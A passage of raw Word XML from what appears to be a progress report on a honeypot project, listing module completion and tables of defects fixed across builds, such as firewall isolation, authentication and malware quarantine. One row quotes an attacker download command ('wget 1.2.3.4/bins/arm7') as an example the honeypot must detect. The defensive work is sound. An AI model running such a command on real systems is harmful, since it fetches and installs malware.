              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AI/ML Attack Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Started: a labelled per-session feature dataset (weak labels from the rule engine, six classes) is produced live and exported as CSV (WBS 10.1). Classifier training is the 100% work. Coverage ≈ 15%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Weighted by the effort of the work breakdown structure (47 weeks), the project stands at about 70% (32.9 of 47 weeks): planning and environment are complete, modules M1–M7 are between 88% and 92%, Module 8 is at 15%, integration and testing at 40% and documentation at 30%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9002" w:name="_Toc69002"/>
      <w:r>
        <w:t xml:space="preserve">1.7 Progress since the Previous Evaluations (30% → 60% → 70%)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9002"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 30% build was reviewed against the scope document before new features were added. Every defect found in that review was fixed first; the table lists each one and its status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Defects of the 30% Build and Their Resolution</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9738" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4954"/>
        <w:gridCol w:w="4784"/>
      </w:tblGrid>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="018CBFC3" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Defect in the 30% build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Status at 60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Isolation not enforced (honeypot network could reach the internet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: deploy/firewall.sh drops all NEW outbound connections from the honeynet subnet (DOCKER-USER chain).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API published to the host without authentication on port 5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: API is internal only; the dashboard is reachable only through Nginx :80 with HTTP basic auth and rate limiting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Per-protocol SQLite tables, sessions table never filled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: one PostgreSQL events table and a sessions row for every connection; old tables kept as SQL views.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH logged no commands and ignored exec requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: interactive shell and exec channels are both captured; one connection may open several channels.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Brute-force counted over all time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: every rule uses a time window (brute force: 10 minutes, configurable through BF_WINDOW_MIN).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MQTT parser failed on packets larger than 127 bytes and on short reads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: variable-length integer decoding, recv_exact() loop and QoS 1/2 packet identifiers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fingerprintable responses (project footer, exact-match commands)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: realistic vendor banners and an argument-tolerant BusyBox shell with pipes and command chaining.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hard-coded database password; no requirements files or tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: secrets in .env, pinned requirements-*.txt, pytest suite, bandit lint and a CI workflow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 60% build was reviewed in the same way before the 70% work began. The table lists the defects that review found; each fix has a regression test (Section 8.6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Defects of the 60% Build and Their Resolution</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9738" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4954"/>
        <w:gridCol w:w="4784"/>
      </w:tblGrid>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="018CBFC3" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Defect in the 60% build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Status at 70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Events containing a NUL byte (binary uploads, MQTT blobs) were silently dropped by PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: common/db.py sanitize() stores NUL as the visible text \x00 in every column, JSON field and Redis message.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scheme-less downloads (wget 1.2.3.4/bins/arm7) produced no download_attempt, IOC or MALWARE_DELIVERY detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: the fake shell normalises the URL and logs every wget, curl, busybox wget and tftp download exactly once.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Malware samples were not stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: quarantine store common/capture.py, file_captures table and YARA scanning (Figure 11).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard unreachable: Nginx published port 80 on an internal-only network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: Nginx is attached to frontnet (published) and backnet (to reach the API).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Outbound isolation only when deploy/firewall.sh was run by hand; not persistent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: a firewall service applies the rules at start-up and re-checks them every 30 s; honeypots start only after its health check passes (Figure 15).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password hash file (MD5-apr1) shipped in the project archive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: auth-init writes a bcrypt hash from DASHBOARD_PASSWORD, or generates a random password and prints it once.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IOC hit counters grew on every 30-second engine pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: ioc_sightings table; a hit is counted once per source event, detection or capture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Demo GeoIP enabled by default and indistinguishable from real data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed: off by default; demo rows are stored with geo_source = demo, tagged DEMO on the dashboard and described as demo locations in reports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="7C705E04" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Telnet IAC split across two TCP reads stored as data; sensor HMI crashed on a form field named actor; report maximum severity ranked alphabetically</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4784" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fixed, each with a regression test: carry buffer in TelnetIO, whitelisted sensor_config(), severity ranked with array_position().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The features added for the 70% milestone are summarised below; Section 4.2 models each of them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Features Added in Version 2.1 (70% Milestone)</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00"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="4080"/>
      </w:tblGrid>
      <w:tr w:rsidR="00240A5B" w14:paraId="00A38001" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Added in Version 2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Where to verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w14:paraId="578730F2" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">M3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288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pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
